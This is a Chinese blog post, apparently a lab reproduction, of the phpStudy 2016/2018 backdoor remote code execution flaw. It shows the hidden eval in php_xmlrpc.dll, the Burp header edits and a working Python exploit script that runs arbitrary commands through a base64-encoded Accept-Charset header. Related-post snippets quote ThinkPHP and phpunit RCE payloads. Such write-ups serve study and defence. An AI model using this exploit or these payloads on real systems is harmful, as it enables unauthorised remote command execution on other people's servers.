phpstudy_2016-2018_rce漏洞复现

已于 2023-01-11 17:30:45 修改
阅读量903 收藏
点赞数 1
文章标签: php 网络安全 web安全 系统安全 安全
于 2022-11-10 14:20:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64583632/article/details/127788018
版权

前言

强如phpstudy也会有漏洞,在当时影响蛮大的,今天那就试着来复现一下这个漏洞

一.漏洞描述

RCE漏洞,攻击者可以利用该漏洞执行PHP命令和执行代码,从而控制用户系统,也可以称作phpStudy 后门。

二.漏洞等级

高危

三.影响版本

phpstudy2016

phpstudy2018

四.准备工具

VMware环境

BurpSuite

phpStudy2016

五.查看漏洞点

打开 \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll 这个文件,找到了这个

 @eval(%s('%s'));

eval函数把字符串当成 PHP 代码来执行

六.漏洞复现

这里是在虚拟机上搭的环境,启动phpstudy2016,访问phpinfo.php,可以正常访问

打开burp suite抓包,访问后缀带有.php的文件进行抓包

我们把数据包里的Accept-Encoding: gzip, deflate(deflate前面是有空格的),我们要把空格删掉,然后再加上Accept-Charset: 这个参数,这个参数是我们是我们要执行的命令,但要把命令进行base64编码,查看对方ip

重发数据包,就可看到对方的IP返回了,之后可以执行查看文件的用户命令,这里就不举例了

 漏洞利用脚本

import requests
import base64
import sys

url="http://192.168.175.136/phpinfo.php"#url自行更换
cmd=input("Please input command: ")#接受想执行的命令
cmd=base64.b64encode(f"print(shell_exec('{cmd}'));".encode())#base64编码,shell_exec是执行系统命令函数
headers={
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0',
    "Accept-Encoding":"gzip,deflate",
    "Accept-Charset":cmd
}
res=requests.post(url=url, headers=headers)#发送get请求
html=res.content.decode("gb2312")#返回是乱码,解码成中文形式
result=html[0:html.index("<!DOCTYPE html")].strip()#字符串截取
print(result)

tacokings
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
phpStudy2016完美版.zip
08-29
phpStudy2016完美版.zip 一个小工具, 对于不想配置mysql,或者是win系统装个mysql很麻烦的,可以下载这个轻量级的 即安装即可使用,完全轻量级
【威胁分析】phpunit远程代码执行漏洞
sinat_35058227的博客
08-29 3091
phpunit是php中的单元测试工具 其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 威胁分析: 1、分析是否利用该漏洞 uri为:/vendor/phpunit/phpunit/src/Util/PHP
phpunit 远程代码执行漏洞(CVE-2017-9841)
这周末在做梦的博客
12-21 2731
本次分享内容为蓝帽杯中web-php的一道题目中的关键漏洞,由于本人技术不够成熟,无法进行完全的,还请见谅。 一,漏洞概述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 二,漏洞版本: 4.8.19 ~ 4.8.27、 5.0.10 ~ 5
phpStudy2016的简单使用
qq_41549657的博客
04-07 2193
下面是phpStudy2016的运行界面 如图上说明,进入之后首先应该需要将Apache停止运行(因为我的项目没有用到),当然如果你需要使用的话也是可以不停止的,停止方法是在其他选项菜单里面 上述操作完成之后,便可以点击MySAL管理器按钮,进入如下界面, 然后导入你所需要导入的数据库文件,一些重要信息在图上已经写出 文件导入完成后,点击导入按钮即可 之后返回程序主界面,如下图,...
Thinkphp5.0.23 rce(远程代码执行)的漏洞
最新发布
Tender*的博客
08-06 432
2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。关掉代理 进入info.php发被解析。1、访问靶机地址+端口号 进入首页。
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpStudy_install_phpStudy_install
09-20
【phpStudy安装详解】 phpStudy是一款非常流行的PHP开发环境集成包,它包含了PHP、Apache、MySQL等组件,方便开发者在Windows环境下快速搭建Web服务器。在本文中,我们将深入探讨phpStudy的安装过程及其核心功能,...
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpstudy_rce.py
10-11
phpstudy_rce
phpStudy_2016.11.03.zip
04-24
mysql服务器高负载的情况下,必须采取一种措施给服务器减轻压力,减少服务器的I/O操作。一般采用的方法是优化sql操作语句,优化服务器的配置参数,从而提高服务器的性能。Mysql使用了几种内存缓存数据的策略来提高...
[Vulfocus解题系列] phpunit 远程代码执行 (CVE-2017-9841)
00勇士王子的博客
07-16 863
漏洞介绍 名称: phpunit 远程代码执行 (CVE-2017-9841) 描述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞漏洞版本 PHPUnit 4.8.19 ~ 4.8.27 PHPUnit 5.0.10 ~ 5.6.2 解题过
PHPUnit远程代码执行漏洞 CVE-2017-9841 漏洞
ADummy的博客
02-27 2803
PHPUnit远程执行代码(CVE-2017-9841) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>命令执行 0x01漏洞介绍 PHPUnit是面向程序员的PHP测试框架。 Util/PHP/eval-stdin.php在4.8.28之前的PHPUnit和5.6.3之前的5.x中允许远程攻击者通过以<?php子字符串开头的HTTP POST数据执行任意PHP代码,如对具有暴露的/ vendor文件夹的站点的攻击(即外部访问)所证明的到/vendor/phpuni
phpstudy访问根目录文件phpinfo.php的配置文件
Dove言和
05-25 7106
phpstudy访问不了phpinfo.php文件或其他根目录文件, 1、请尝试一下制下列代码! server { listen 80; server_name localhost; root "D:/phpStudy/WWW"; location / { index index.html index.htm index.php; #autoindex on; } location ~ .p...
phpstudy初体验使用教程说明完整篇
智库新闻文章内容管理系统博客
03-07 2367
phpstudy初体验使用教程说明完整篇一、首先已经安装好了phpStudy程序,并确保能正常运行,打开phpstudy主界面,在左上角,显示的是当当前程序的状态,绿色代表的是运行正常,红色则代表异常或者停止状态。二、在显示状态下面显示的是提示信息,会显示出你对该程序操作了一些什么,或者出异常问题也会说明三、在右上角部分,有三个按钮可以操作程序的启动和停止以及重启,另外,把鼠标放在按钮上点击右键...
phpStudy 使用 localhost 访问返回 403 forbidden
studyphp123的博客
11-24 3193
问题描述:phpStudy 使用 localhost 可以访问 phpinfo.php,但是无法访问 WWW 下的其他目录,总是返回 Forbidden? 1)使用 localhost 访问 phpinfo.php 的访问结果: 访问 localhost 访问 phpinfo.php 2)使用 localhost 访问 WWW 下 其他目录 的访问结果: 解答: 一般出这种问题,是由...
php下载安装方法,phpstudy 2016免费版-php开发环境下载 v2016.11.03 附带安装教程 - 安下载...
weixin_33278498的博客
03-18 1973
phpstudy2016是目前网络上最优秀的一款php环境集成包,该系统内置了多个功能模块,可以为编程人员提供非常多的帮助以及服务;此程序包支持可移植性,PHP可在各种平台上运行,如MicrosoftWindows,Linux等,并且它与目前使用的几乎所有服务器兼容,如Apache,IIS等;提供快速性能:用PHP编写的脚本通常比用其他脚本语言(ASP,Ruby,Python,Java等)写的脚本...
ThinkPHP 多语言模块RCE漏洞
0xSec
12-25 3601
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
phpstudy_2016-2018_rce 漏洞及深度利用
m0_67189356的博客
04-16 5140
说明 内容 漏洞编号 phpstudy_2016-2018_rce 漏洞名称 RCE(Remote Command|Code Execute) 漏洞评级 高危 影响范围 phpStudy 2016 phpStudy 2018 漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code E
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行分组并统计,但有时在分组的字段中可能有一些非空的空值,这时MySQL在默认情况下会将这些空值也视作相同的值进行分组并统计,这可能会导致统计结果出错误。 而only_full_group_by模式可以在分组时排除空值,只对真正有值的字段进行分组和统计,这样可以确保统计结果的正确性。 然而,启用only_full_group_by模式会使MySQL对语句执行更多的检查和计算,降低了查询的效率,因此在一些MySQL版本中默认关闭了这个模式。如果需要启用,需要手动设置sql_mode为包含only_full_group_by的值。 至于-advertisement部分,可能是意味着这是一条非广告的信息或公告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tacokings

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值